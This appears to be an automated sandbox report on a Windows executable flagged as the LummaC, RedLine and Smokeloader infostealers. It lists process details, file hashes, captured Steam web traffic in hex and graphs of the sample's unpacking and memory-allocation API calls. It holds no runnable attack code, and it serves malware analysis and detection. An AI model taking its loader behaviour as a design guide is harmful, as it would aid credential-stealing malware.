                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                    2024-12-17 15:42:15 UTC10097INData Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55
                                                                                                                                                                                                                                                    Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
                                                                                                                                                                                                                                                    2024-12-17 15:42:15 UTC10555INData Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75
                                                                                                                                                                                                                                                    Data Ascii: ;WEB_UNIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&qu


                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:10:41:59
                                                                                                                                                                                                                                                    Start date:17/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\66DJ2wErLz.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\66DJ2wErLz.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:368'640 bytes
                                                                                                                                                                                                                                                    MD5 hash:2C0A5976C7D6D86506EB825C8D67A8B8
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2375210203.0000000000AC9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                    Start time:10:42:16
                                                                                                                                                                                                                                                    Start date:17/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1724
                                                                                                                                                                                                                                                    Imagebase:0xa60000
                                                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                      Execution Coverage:1.8%
                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:40%
                                                                                                                                                                                                                                                      Signature Coverage:50%
                                                                                                                                                                                                                                                      Total number of Nodes:70
                                                                                                                                                                                                                                                      Total number of Limit Nodes:4
                                                                                                                                                                                                                                                      execution_graph 26240 9e003c 26241 9e0049 26240->26241 26255 9e0e0f SetErrorMode SetErrorMode 26241->26255 26246 9e0265 26247 9e02ce VirtualProtect 26246->26247 26249 9e030b 26247->26249 26248 9e0439 VirtualFree 26253 9e05f4 LoadLibraryA 26248->26253 26254 9e04be 26248->26254 26249->26248 26250 9e04e3 LoadLibraryA 26250->26254 26252 9e08c7 26253->26252 26254->26250 26254->26253 26256 9e0223 26255->26256 26257 9e0d90 26256->26257 26258 9e0dad 26257->26258 26259 9e0dbb GetPEB 26258->26259 26260 9e0238 VirtualAlloc 26258->26260 26259->26260 26260->26246 26261 ac978e 26262 ac979d 26261->26262 26265 ac9f2e 26262->26265 26268 ac9f49 26265->26268 26266 ac9f52 CreateToolhelp32Snapshot 26267 ac9f6e Module32First 26266->26267 26266->26268 26269 ac9f7d 26267->26269 26270 ac97a6 26267->26270 26268->26266 26268->26267 26272 ac9bed 26269->26272 26273 ac9c18 26272->26273 26274 ac9c29 VirtualAlloc 26273->26274 26275 ac9c61 26273->26275 26274->26275 26275->26275 26276 43cd60 26278 43cd80 26276->26278 26277 43ce3e 26280 43cdbe 26278->26280 26282 43a9b0 LdrInitializeThunk 26278->26282 26280->26277 26283 43a9b0 LdrInitializeThunk 26280->26283 26282->26280 26283->26277 26294 43b068 26295 43b080 26294->26295 26297 43b16e 26295->26297 26300 43a9b0 LdrInitializeThunk 26295->26300 26298 43b23f 26297->26298 26301 43a9b0 LdrInitializeThunk 26297->26301 26298->26298 26300->26297 26301->26298 26302 40b44c 26306 40b45a 26302->26306 26307 40b57c 26302->26307 26303 40b65c 26305 43a950 2 API calls 26303->26305 26305->26307 26306->26303 26306->26307 26308 43a950 26306->26308 26309 43a976 26308->26309 26310 43a995 26308->26310 26311 43a98a 26308->26311 26312 43a968 26308->26312 26314 43a97b RtlReAllocateHeap 26309->26314 26315 438e70 26310->26315 26311->26303 26312->26309 26312->26310 26314->26311 26316 438e83 26315->26316 26317 438e94 26315->26317 26318 438e88 RtlFreeHeap 26316->26318 26317->26311 26318->26317 26319 43aecc 26321 43af00 26319->26321 26320 43af7e 26321->26320 26323 43a9b0 LdrInitializeThunk 26321->26323 26323->26320 26324 408790 26326 40879f 26324->26326 26325 408970 ExitProcess 26326->26325 26327 4087b4 GetCurrentProcessId GetCurrentThreadId 26326->26327 26330 40887a 26326->26330 26328 4087da 26327->26328 26329 4087de SHGetSpecialFolderPathW GetForegroundWindow 26327->26329 26328->26329 26329->26330 26330->26325 26331 438e51 RtlAllocateHeap 26332 43ab91 26333 43ab9a GetForegroundWindow 26332->26333 26334 43abad 26333->26334

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4063528623-0
                                                                                                                                                                                                                                                      • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                      • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 129 ac9f2e-ac9f47 130 ac9f49-ac9f4b 129->130 131 ac9f4d 130->131 132 ac9f52-ac9f5e CreateToolhelp32Snapshot 130->132 131->132 133 ac9f6e-ac9f7b Module32First 132->133 134 ac9f60-ac9f66 132->134 135 ac9f7d-ac9f7e call ac9bed 133->135 136 ac9f84-ac9f8c 133->136 134->133 139 ac9f68-ac9f6c 134->139 140 ac9f83 135->140 139->130 139->133 140->136
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AC9F56
                                                                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 00AC9F76
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375210203.0000000000AC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AC9000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ac9000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                      • Instruction ID: ce4aec234f6def2d81c665ace09a9aa97b137acf74547ab9b5fcd33f161f5fb6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F096366007147BD7203BF5A88DFAFB6ECAF49724F11062CE656D10C0DB70EC454AA1

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 246 40b44c-40b453 247 40b4c0 246->247 248 40b7e0-40b7f0 246->248 249 40b4e4 246->249 250 40b4c6-40b4dd 246->250 251 40b7a7-40b7b1 246->251 252 40b4ae 246->252 253 40b4f1-40b502 246->253 254 40b4b4 246->254 255 40b6d7-40b6f5 246->255 256 40b797-40b7a0 246->256 257 40b7f7-40b804 246->257 258 40b738-40b756 246->258 259 40b7b8-40b7d9 246->259 260 40b45a-40b467 246->260 247->250 248->257 261 40b4a0-40b4a6 248->261 262 40b6a4 248->262 263 40b48c-40b490 248->263 264 40b46e-40b483 call 43c280 248->264 267 40b6c6-40b6cf 248->267 268 40b588 248->268 269 40b80b 248->269 270 40b60c 248->270 271 40b58e-40b5af 248->271 272 40b650-40b65f call 43a950 248->272 273 40b811-40b82b call 43c280 248->273 274 40b854-40b85d 248->274 275 40b5d5-40b5dc 248->275 276 40b697-40b699 248->276 277 40b620-40b627 248->277 278 40b862 248->278 279 40b662-40b670 call 43a950 248->279 280 40b870-40b880 248->280 281 40b630-40b634 248->281 282 40b5f0-40b605 248->282 283 40b570-40b575 248->283 284 40b5b0-40b5cd 248->284 285 40b830-40b84c call 43c280 248->285 286 40b679 248->286 287 40b63b-40b63f 248->287 288 40b57c-40b57f 248->288 289 40b67e-40b695 call 43c280 248->289 249->253 250->248 250->249 250->251 250->253 250->255 250->256 250->257 250->258 250->259 250->261 250->262 250->263 250->264 250->267 250->268 250->269 250->270 250->271 250->272 250->273 250->274 250->275 250->276 250->277 250->278 250->279 250->280 250->281 250->282 250->283 250->284 250->285 250->286 250->287 250->288 250->289 251->259 251->261 251->262 251->263 251->264 251->276 251->289 252->254 290 40b510-40b562 253->290 254->247 265 40b700-40b71c 255->265 256->248 256->251 256->257 256->259 256->261 256->262 256->263 256->264 256->267 256->268 256->269 256->270 256->271 256->272 256->273 256->274 256->275 256->276 256->277 256->278 256->279 256->280 256->281 256->282 256->283 256->284 256->285 256->286 256->287 256->288 256->289 257->261 257->262 257->263 257->264 257->269 257->273 257->274 257->276 257->285 257->289 266 40b760-40b77c 258->266 259->248 259->257 259->261 259->262 259->263 259->264 259->267 259->268 259->269 259->270 259->271 259->272 259->273 259->274 259->275 259->276 259->277 259->278 259->279 259->280 259->281 259->282 259->283 259->284 259->285 259->286 259->287 259->288 259->289 260->261 260->262 260->263 260->264 261->252 311 40b6ad-40b6c5 262->311 263->261 264->263 265->265 296 40b71e-40b732 265->296 266->266 297 40b77e-40b792 266->297 267->255 270->277 271->284 272->279 273->285 294 40b69b 274->294 275->261 275->262 275->263 275->264 275->269 275->273 275->274 275->276 275->282 275->285 275->286 275->288 275->289 276->294 277->261 277->262 277->263 277->264 277->268 277->269 277->271 277->273 277->274 277->275 277->276 277->281 277->283 277->284 277->285 277->286 277->288 277->289 279->286 281->287 282->261 282->262 282->263 282->264 282->268 282->269 282->270 282->271 282->272 282->273 282->274 282->275 282->276 282->277 282->279 282->283 282->284 282->285 282->286 282->288 282->289 283->261 283->262 283->263 283->264 283->269 283->273 283->274 283->276 283->285 283->286 283->288 283->289 284->275 285->274 286->289 305 40b646 287->305 288->268 289->276 290->290 299 40b564-40b567 290->299 294->262 296->258 297->255 299->283 305->272
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: h d"
                                                                                                                                                                                                                                                      • API String ID: 0-862628183
                                                                                                                                                                                                                                                      • Opcode ID: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                                                                                                                                                                                                                      • Instruction ID: e7b26040d347b48bd15f509a2e92d141a5522c4f34e33ed28b849909e17f734e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81B1CF79204700CFD3248F74EC91B67B7F6FB4A301F058A7DE99682AA0D774A859CB18

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 338 43a9b0-43a9e2 LdrInitializeThunk
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                      • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                      • Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                      • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                      • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                      • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 0 9e003c-9e0047 1 9e004c-9e0263 call 9e0a3f call 9e0e0f call 9e0d90 VirtualAlloc 0->1 2 9e0049 0->2 17 9e028b-9e0292 1->17 18 9e0265-9e0289 call 9e0a69 1->18 2->1 20 9e02a1-9e02b0 17->20 22 9e02ce-9e03c2 VirtualProtect call 9e0cce call 9e0ce7 18->22 20->22 23 9e02b2-9e02cc 20->23 29 9e03d1-9e03e0 22->29 23->20 30 9e0439-9e04b8 VirtualFree 29->30 31 9e03e2-9e0437 call 9e0ce7 29->31 33 9e04be-9e04cd 30->33 34 9e05f4-9e05fe 30->34 31->29 36 9e04d3-9e04dd 33->36 37 9e077f-9e0789 34->37 38 9e0604-9e060d 34->38 36->34 42 9e04e3-9e0505 LoadLibraryA 36->42 40 9e078b-9e07a3 37->40 41 9e07a6-9e07b0 37->41 38->37 43 9e0613-9e0637 38->43 40->41 44 9e086e-9e08be LoadLibraryA 41->44 45 9e07b6-9e07cb 41->45 46 9e0517-9e0520 42->46 47 9e0507-9e0515 42->47 48 9e063e-9e0648 43->48 53 9e08c7-9e08f9 44->53 49 9e07d2-9e07d5 45->49 50 9e0526-9e0547 46->50 47->50 48->37 51 9e064e-9e065a 48->51 54 9e07d7-9e07e0 49->54 55 9e0824-9e0833 49->55 56 9e054d-9e0550 50->56 51->37 52 9e0660-9e066a 51->52 59 9e067a-9e0689 52->59 61 9e08fb-9e0901 53->61 62 9e0902-9e091d 53->62 63 9e07e4-9e0822 54->63 64 9e07e2 54->64 60 9e0839-9e083c 55->60 57 9e0556-9e056b 56->57 58 9e05e0-9e05ef 56->58 65 9e056f-9e057a 57->65 66 9e056d 57->66 58->36 67 9e068f-9e06b2 59->67 68 9e0750-9e077a 59->68 60->44 69 9e083e-9e0847 60->69 61->62 63->49 64->55 70 9e057c-9e0599 65->70 71 9e059b-9e05bb 65->71 66->58 72 9e06ef-9e06fc 67->72 73 9e06b4-9e06ed 67->73 68->48 74 9e084b-9e086c 69->74 75 9e0849 69->75 83 9e05bd-9e05db 70->83 71->83 77 9e06fe-9e0748 72->77 78 9e074b 72->78 73->72 74->60 75->44 77->78 78->59 83->56
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009E024D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                      • Instruction ID: f5a3dc62cdc7acb52c977fcb413e7c7b233ed43874cc1a3f8a902debe43d26ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6528874A00269DFDB65CF59C984BA8BBB1BF49304F1480D9E94DAB351DB70AE84DF10

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 123 43ab0b-43ab1f 124 43ab20-43ab7b 123->124 124->124 125 43ab7d-43abce GetForegroundWindow call 43c7d0 124->125
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ForegroundWindow
                                                                                                                                                                                                                                                      • String ID: ilmn
                                                                                                                                                                                                                                                      • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                                      • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                      • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
